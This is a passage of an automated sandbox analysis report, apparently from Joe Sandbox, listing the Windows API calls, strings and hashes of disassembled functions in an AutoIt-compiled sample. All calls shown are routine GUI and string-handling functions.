                                                                                                                    • DeleteObject.GDI32(?), ref: 0033AA94
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0033AA9A
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0033AAA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    • Opcode ID: 168dfe3ba2355641dd055f8a31cac4f91844e2c5efeb0710587e064178f64fef
                                                                                                                    • Instruction ID: 4aa0d132de92e6f1e833e45c85cb46cfe43b5f545541eb7f5ecaadf3ed48a6b8
                                                                                                                    • Opcode Fuzzy Hash: 168dfe3ba2355641dd055f8a31cac4f91844e2c5efeb0710587e064178f64fef
                                                                                                                    • Instruction Fuzzy Hash: 6E512B71D00608FFDB129FA4DC89EAEBBB9EF08320F514625F911AB2A1D7759940DF90
                                                                                                                    Function 003389D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00338AC1
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00338AD2
                                                                                                                    • CharNextW.USER32(0000014E), ref: 00338B01
                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00338B42
                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00338B58
                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00338B69
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00338B86
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00338BD8
                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00338BEE
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00338C1F
                                                                                                                    • _memset.LIBCMT ref: 00338C44
                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00338C8D
                                                                                                                    • _memset.LIBCMT ref: 00338CEC
                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00338D16
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00338D6E
                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00338E1B
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00338E3D
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00338E87
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00338EB4
                                                                                                                    • DrawMenuBar.USER32(?), ref: 00338EC3
                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00338EEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                    • Opcode ID: d12688cba5ab9da98c2255e60cf4005f4e2710cc49710534fdad22fea53e9430
                                                                                                                    • Instruction ID: deeb95afc373147495917652ac4e324099f36525f9fa6b4201535ce7d87964c2
                                                                                                                    • Opcode Fuzzy Hash: d12688cba5ab9da98c2255e60cf4005f4e2710cc49710534fdad22fea53e9430
                                                                                                                    • Instruction Fuzzy Hash: ADE15EB1900309AFDF229F64CCC5EEEBBB9EF05710F118156F915AA290DB748A85DF60
                                                                                                                    Function 0033488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 003349CA
                                                                                                                    • GetDesktopWindow.USER32 ref: 003349DF
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003349E6
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00334A48
                                                                                                                    • DestroyWindow.USER32(?), ref: 00334A74
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00334A9D
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00334ABB
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00334AE1
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00334AF6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00334B09
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00334B29
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00334B44
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00334B58
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00334B70
                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00334B96
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00334BB0
                                                                                                                    • CopyRect.USER32(?,?), ref: 00334BC7
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00334C32
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                    • Opcode ID: 47ba2fd088c6bbd3f394760a73d11f25636e3d4691307463980c153159af25a6
                                                                                                                    • Instruction ID: b5a98523a172e8b490fdedf613bdf3ed11803d7609422a444728e52255f4d7fb
                                                                                                                    • Opcode Fuzzy Hash: 47ba2fd088c6bbd3f394760a73d11f25636e3d4691307463980c153159af25a6
                                                                                                                    • Instruction Fuzzy Hash: 75B19A70608340AFDB05DF64C885B6ABBE8FF88344F008A1DF9999B2A1D771EC45CB95
                                                                                                                    Function 0031449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003144AC
                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003144D2
                                                                                                                    • _wcscpy.LIBCMT ref: 00314500
                                                                                                                    • _wcscmp.LIBCMT ref: 0031450B
                                                                                                                    • _wcscat.LIBCMT ref: 00314521
                                                                                                                    • _wcsstr.LIBCMT ref: 0031452C
                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00314548
                                                                                                                    • _wcscat.LIBCMT ref: 00314591
                                                                                                                    • _wcscat.LIBCMT ref: 00314598
                                                                                                                    • _wcsncpy.LIBCMT ref: 003145C3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                    • Opcode ID: 0b42d6e81ac6988e0eebafa28401cae10013a6200c50c1b9c81a8d335ae45808
                                                                                                                    • Instruction ID: d638eb767a438a33e86cb9bdea47580599bd34e2cdf5a6f5e3db1e7eda9ea107
                                                                                                                    • Opcode Fuzzy Hash: 0b42d6e81ac6988e0eebafa28401cae10013a6200c50c1b9c81a8d335ae45808
                                                                                                                    • Instruction Fuzzy Hash: CA41F531A10200BBDB16EB74CC47EFF776CDF4A710F40456BF904E6292EA359E219AA5
                                                                                                                    Function 002B27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B28BC
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 002B28C4
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002B28EF
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 002B28F7
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002B291C
                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002B2939
                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002B2949
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002B297C
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002B2990
                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 002B29AE
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002B29CA
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 002B29D5
                                                                                                                      • Part of subcall function 002B2344: GetCursorPos.USER32(?), ref: 002B2357
                                                                                                                      • Part of subcall function 002B2344: ScreenToClient.USER32(003757B0,?), ref: 002B2374
                                                                                                                      • Part of subcall function 002B2344: GetAsyncKeyState.USER32(00000001), ref: 002B2399
                                                                                                                      • Part of subcall function 002B2344: GetAsyncKeyState.USER32(00000002), ref: 002B23A7
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,002B1256), ref: 002B29FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: 9339203f496a43f58e908da1a216ae91f5e3f5ca0db8bc94535e2fb71c23f5a5
                                                                                                                    • Instruction ID: f60d1caf5bada9250eddb81529b4a19e4052b73a6e9dc85c4df4a120e0d3cfb7
                                                                                                                    • Opcode Fuzzy Hash: 9339203f496a43f58e908da1a216ae91f5e3f5ca0db8bc94535e2fb71c23f5a5
                                                                                                                    • Instruction Fuzzy Hash: 4CB18F71A1020AEFDB15DFA8CC85BED7BB8FB08351F504129FA19A72A0DB749861CF50
                                                                                                                    Function 0030A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0030A47A
                                                                                                                    • __swprintf.LIBCMT ref: 0030A51B
                                                                                                                    • _wcscmp.LIBCMT ref: 0030A52E
                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0030A583
                                                                                                                    • _wcscmp.LIBCMT ref: 0030A5BF
                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0030A5F6
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0030A648
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0030A67E
                                                                                                                    • GetParent.USER32(?), ref: 0030A69C
                                                                                                                    • ScreenToClient.USER32(00000000), ref: 0030A6A3
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0030A71D
                                                                                                                    • _wcscmp.LIBCMT ref: 0030A731
                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0030A757
                                                                                                                    • _wcscmp.LIBCMT ref: 0030A76B
                                                                                                                      • Part of subcall function 002D362C: _iswctype.LIBCMT ref: 002D3634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                    • Opcode ID: 6067c4c36cee3620b8a3e17e70b8ec447738e404dd95e6c08e2ea1765bc4cffe
                                                                                                                    • Instruction ID: c80cd3db7f2c49a273a28630ab99ae0c2fba484cd6afefd53f0a2cc3cedff2fe
                                                                                                                    • Opcode Fuzzy Hash: 6067c4c36cee3620b8a3e17e70b8ec447738e404dd95e6c08e2ea1765bc4cffe
                                                                                                                    • Instruction Fuzzy Hash: A4A10131205B06AFC71ADF60D894FEAB7E8FF44754F008629F999D2190DB30E955CB92
                                                                                                                    Function 0030AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0030AF18
                                                                                                                    • _wcscmp.LIBCMT ref: 0030AF29
                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0030AF51
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0030AF6E
                                                                                                                    • _wcscmp.LIBCMT ref: 0030AF8C
                                                                                                                    • _wcsstr.LIBCMT ref: 0030AF9D
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0030AFD5
                                                                                                                    • _wcscmp.LIBCMT ref: 0030AFE5
                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0030B00C
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0030B055
                                                                                                                    • _wcscmp.LIBCMT ref: 0030B065
                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0030B08D
                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0030B0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                    • Opcode ID: 3bfc30a145d81c68cabaf523e75f5421ab94128816049fe0ac061bcec0016300
                                                                                                                    • Instruction ID: c1707f76b08e0862bd7356b0f66dcb9c036275441a0c8939dbcbd1d7ad7637c0
                                                                                                                    • Opcode Fuzzy Hash: 3bfc30a145d81c68cabaf523e75f5421ab94128816049fe0ac061bcec0016300
                                                                                                                    • Instruction Fuzzy Hash: CA81BF711093069FDB06DF14D8A1FAABBE8EF44354F04846AFD859A0D5DB30DD89CBA2
                                                                                                                    Function 0033C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0033C627
                                                                                                                      • Part of subcall function 0033AB37: ClientToScreen.USER32(?,?), ref: 0033AB60
                                                                                                                      • Part of subcall function 0033AB37: GetWindowRect.USER32(?,?), ref: 0033ABD6
                                                                                                                      • Part of subcall function 0033AB37: PtInRect.USER32(?,?,0033C014), ref: 0033ABE6
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0033C690
                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0033C69B
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0033C6BE
                                                                                                                    • _wcscat.LIBCMT ref: 0033C6EE
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0033C705
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0033C71E
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0033C735
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0033C757
                                                                                                                    • DragFinish.SHELL32(?), ref: 0033C75E
                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0033C851
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb7
                                                                                                                    • API String ID: 169749273-563541782
                                                                                                                    • Opcode ID: 8eeed1d3ead24d0649e24a0092c04a55d1de7f11e70bce502c65f971fbca4427
                                                                                                                    • Instruction ID: 4fd256950431f319844973d1edbc728ec0981dbdef70a333f1c554e06f20afbe
                                                                                                                    • Opcode Fuzzy Hash: 8eeed1d3ead24d0649e24a0092c04a55d1de7f11e70bce502c65f971fbca4427
                                                                                                                    • Instruction Fuzzy Hash: C3617B71508301AFC702EF64CC85DAFBBF8EF89750F40492EF595961A1DB709A49CB52
                                                                                                                    Function 0030ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                    • Opcode ID: dbbf4fcac0ac82de93e7c7e5f44606cafcb8448b58ecdedd82259a6318980baf
                                                                                                                    • Instruction ID: bdb81021636b8cc4a13f700396f725b996a057cdaa976e53da1970efc74dc0b3
                                                                                                                    • Opcode Fuzzy Hash: dbbf4fcac0ac82de93e7c7e5f44606cafcb8448b58ecdedd82259a6318980baf
                                                                                                                    • Instruction Fuzzy Hash: AD31C530558705A7EA16FBA0ED13EEE77689F10794F604429F401B12D5EF516F24CE52
                                                                                                                    Function 00324FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00325013
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0032501E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00325029
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00325034
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0032503F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0032504A
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00325055
                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00325060
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0032506B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00325076
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00325081
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0032508C
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00325097
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 003250A2
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 003250AD
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 003250B8
                                                                                                                    • GetCursorInfo.USER32(?), ref: 003250C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2577412497-0
                                                                                                                    • Opcode ID: 9bac4798a59032d773152c8764420437d0be4d3e1d22a4dc4c8ec42277d85646
                                                                                                                    • Instruction ID: a2559251cc93b03a61d0604de0928d268dff9288133f3a4dc7fb26cf5bc3ebe0
                                                                                                                    • Opcode Fuzzy Hash: 9bac4798a59032d773152c8764420437d0be4d3e1d22a4dc4c8ec42277d85646
                                                                                                                    • Instruction Fuzzy Hash: 9231D2B1D483196ADF119FB69C899AEBFE8FF04750F50452AE50DE7280DA78A500CFA1
                                                                                                                    Function 0033A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033A259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0033A2D3
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0033A34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0033A36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033A382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0033A3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002B0000,00000000), ref: 0033A3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0033A3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 0033A40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0033A414
